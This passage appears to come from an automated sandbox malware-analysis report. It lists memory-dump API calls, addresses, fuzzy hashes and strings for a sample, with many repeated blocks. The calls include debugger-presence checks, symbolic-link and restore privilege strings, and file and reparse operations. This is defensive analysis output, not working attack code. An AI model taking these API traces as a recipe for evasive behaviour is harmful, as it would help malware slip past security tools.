                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 7bf4dcd4626ab7b3c7da128d85e8ac3279b7041c66123dd57c2ef6e8451c30ae
                                                                                              • Instruction ID: bf7c66674687040c75948558d2558834e1388c0c8d89ecabdb08cace1eea1f81
                                                                                              • Opcode Fuzzy Hash: 7bf4dcd4626ab7b3c7da128d85e8ac3279b7041c66123dd57c2ef6e8451c30ae
                                                                                              • Instruction Fuzzy Hash: C8A011B22AC003BCB00C22C0BC82C3A030CC8C0B20338C80AF08AA00C0ABC0280A0830
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: aa9bda131d6c5865c5c4d6b78e1cf19650426215bcf475ada45a3145d7de6386
                                                                                              • Instruction ID: bf7c66674687040c75948558d2558834e1388c0c8d89ecabdb08cace1eea1f81
                                                                                              • Opcode Fuzzy Hash: aa9bda131d6c5865c5c4d6b78e1cf19650426215bcf475ada45a3145d7de6386
                                                                                              • Instruction Fuzzy Hash: C8A011B22AC003BCB00C22C0BC82C3A030CC8C0B20338C80AF08AA00C0ABC0280A0830
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: dc14316c27cc16ea9991916c464c65f61c12f256ba02181af9fbf91d010400fc
                                                                                              • Instruction ID: bf7c66674687040c75948558d2558834e1388c0c8d89ecabdb08cace1eea1f81
                                                                                              • Opcode Fuzzy Hash: dc14316c27cc16ea9991916c464c65f61c12f256ba02181af9fbf91d010400fc
                                                                                              • Instruction Fuzzy Hash: C8A011B22AC003BCB00C22C0BC82C3A030CC8C0B20338C80AF08AA00C0ABC0280A0830
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: a34b6b9ec138904923fd235fbc1d011d92bdcf95c43edba7726aa847cfb52cfe
                                                                                              • Instruction ID: bf7c66674687040c75948558d2558834e1388c0c8d89ecabdb08cace1eea1f81
                                                                                              • Opcode Fuzzy Hash: a34b6b9ec138904923fd235fbc1d011d92bdcf95c43edba7726aa847cfb52cfe
                                                                                              • Instruction Fuzzy Hash: C8A011B22AC003BCB00C22C0BC82C3A030CC8C0B20338C80AF08AA00C0ABC0280A0830
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 12650870bf1ac88bf560fd82abe0a3fe1fa4dbf897d2c9e594052decec8a47f1
                                                                                              • Instruction ID: bf7c66674687040c75948558d2558834e1388c0c8d89ecabdb08cace1eea1f81
                                                                                              • Opcode Fuzzy Hash: 12650870bf1ac88bf560fd82abe0a3fe1fa4dbf897d2c9e594052decec8a47f1
                                                                                              • Instruction Fuzzy Hash: C8A011B22AC003BCB00C22C0BC82C3A030CC8C0B20338C80AF08AA00C0ABC0280A0830
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 7bcedb1b468450a7eb4f7c3d654d8fb5b6682c3192ad2a7c800539d25dad4596
                                                                                              • Instruction ID: bf7c66674687040c75948558d2558834e1388c0c8d89ecabdb08cace1eea1f81
                                                                                              • Opcode Fuzzy Hash: 7bcedb1b468450a7eb4f7c3d654d8fb5b6682c3192ad2a7c800539d25dad4596
                                                                                              • Instruction Fuzzy Hash: C8A011B22AC003BCB00C22C0BC82C3A030CC8C0B20338C80AF08AA00C0ABC0280A0830
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DAB2
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 0af86cee23e0b1e63799adc816f31fb79b7067ef1bf445cb95adf1400683acc8
                                                                                              • Instruction ID: 7d84ade529699a7ecf3d3d49b2dd078bcab4e4bb9755f9b059f874849567b813
                                                                                              • Opcode Fuzzy Hash: 0af86cee23e0b1e63799adc816f31fb79b7067ef1bf445cb95adf1400683acc8
                                                                                              • Instruction Fuzzy Hash: 0FA011B22AC003FCB00C32C2BC02C3A030CC0C8B203308A0AB08A800C8ABC0280A8832
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DBD5
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DBD5
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DBD5
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DBD5
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DC36
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DC36
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • SetEndOfFile.KERNELBASE(?,000F9104,?,?,-00001964), ref: 000F9EC2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: File
                                                                                              • String ID:
                                                                                              • API String ID: 749574446-0
                                                                                              APIs
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,0010A587,C:\Users\user\Desktop,00000000,0013946A,00000006), ref: 0010A326
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory
                                                                                              • String ID:
                                                                                              • API String ID: 1611563598-0
                                                                                              APIs
                                                                                              • CloseHandle.KERNELBASE(000000FF,?,?,000F968F,?,?,?,?,00121FA1,000000FF), ref: 000F96EB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: CloseHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2962429428-0
                                                                                              APIs
                                                                                                • Part of subcall function 000F130B: GetDlgItem.USER32(00000000,00003021), ref: 000F134F
                                                                                                • Part of subcall function 000F130B: SetWindowTextW.USER32(00000000,001235B4), ref: 000F1365
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0010B971
                                                                                              • EndDialog.USER32(?,00000006), ref: 0010B984
                                                                                              • GetDlgItem.USER32(?,0000006C), ref: 0010B9A0
                                                                                              • SetFocus.USER32(00000000), ref: 0010B9A7
                                                                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 0010B9E1
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0010BA18
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0010BA2E
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0010BA4C
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0010BA5C
                                                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0010BA78
                                                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0010BA94
                                                                                              • _swprintf.LIBCMT ref: 0010BAC4
                                                                                                • Part of subcall function 000F400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000F401D
                                                                                              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0010BAD7
                                                                                              • FindClose.KERNEL32(00000000), ref: 0010BADE
                                                                                              • _swprintf.LIBCMT ref: 0010BB37
                                                                                              • SetDlgItemTextW.USER32(?,00000068,?), ref: 0010BB4A
                                                                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0010BB67
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0010BB87
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0010BB97
                                                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0010BBB1
                                                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0010BBC9
                                                                                              • _swprintf.LIBCMT ref: 0010BBF5
                                                                                              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0010BC08
                                                                                              • _swprintf.LIBCMT ref: 0010BC5C
                                                                                              • SetDlgItemTextW.USER32(?,00000069,?), ref: 0010BC6F
                                                                                                • Part of subcall function 0010A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0010A662
                                                                                                • Part of subcall function 0010A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,0012E600,?,?), ref: 0010A6B1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                              • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                              • API String ID: 797121971-1840816070
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 000F7191
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 000F72F1
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 000F7301
                                                                                                • Part of subcall function 000F7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 000F7C04
                                                                                                • Part of subcall function 000F7BF5: GetLastError.KERNEL32 ref: 000F7C4A
                                                                                                • Part of subcall function 000F7BF5: CloseHandle.KERNEL32(?), ref: 000F7C59
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 000F730C
                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 000F741A
                                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 000F7446
                                                                                              • CloseHandle.KERNEL32(?), ref: 000F7457
                                                                                              • GetLastError.KERNEL32 ref: 000F7467
                                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 000F74B3
                                                                                              • DeleteFileW.KERNEL32(?), ref: 000F74DB
                                                                                              Similarity
                                                                                              • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                              • API String ID: 3935142422-3508440684
                                                                                              Similarity
                                                                                              • API ID: H_prolog_memcmp
                                                                                              • String ID: CMT$h%u$hc%u
                                                                                              • API String ID: 3004599000-3282847064
                                                                                              Similarity
                                                                                              • API ID: __floor_pentium4
                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                              • API String ID: 4168288129-2761157908
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 000F27F1
                                                                                              • _strlen.LIBCMT ref: 000F2D7F
                                                                                                • Part of subcall function 0010137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,000FB652,00000000,?,?,?,00010412), ref: 00101396
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000F2EE0
                                                                                              Similarity
                                                                                              • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                              • String ID: CMT
                                                                                              • API String ID: 1706572503-2756464174
                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00118767
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00118771
                                                                                              • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 0011877E
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                              • String ID:
                                                                                              • API String ID: 3906539128-0
                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0010A662
                                                                                              • GetNumberFormatW.KERNEL32(00000400,00000000,?,0012E600,?,?), ref: 0010A6B1
                                                                                              Similarity
                                                                                              • API ID: FormatInfoLocaleNumber
                                                                                              • String ID:
                                                                                              • API String ID: 2169056816-0
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(0010117C,?,00000200), ref: 000F6EC9
                                                                                              • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 000F6EEA
                                                                                              Similarity
                                                                                              • API ID: ErrorFormatLastMessage
                                                                                              • String ID:
                                                                                              • API String ID: 3479602957-0
                                                                                              APIs
                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0012118F,?,?,00000008,?,?,00120E2F,00000000), ref: 001213C1
                                                                                              Similarity
                                                                                              • API ID: ExceptionRaise
                                                                                              • String ID:
                                                                                              • API String ID: 3997070919-0
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: gj
                                                                                              • API String ID: 0-4203073231
                                                                                              APIs
                                                                                              • GetVersionExW.KERNEL32(?), ref: 000FAD1A
                                                                                              Similarity
                                                                                              • API ID: Version
                                                                                              • String ID:
                                                                                              • API String ID: 1889659487-0
                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,0010EAC5), ref: 0010F068
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: HeapProcess
                                                                                              • String ID:
                                                                                              • API String ID: 54951025-0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
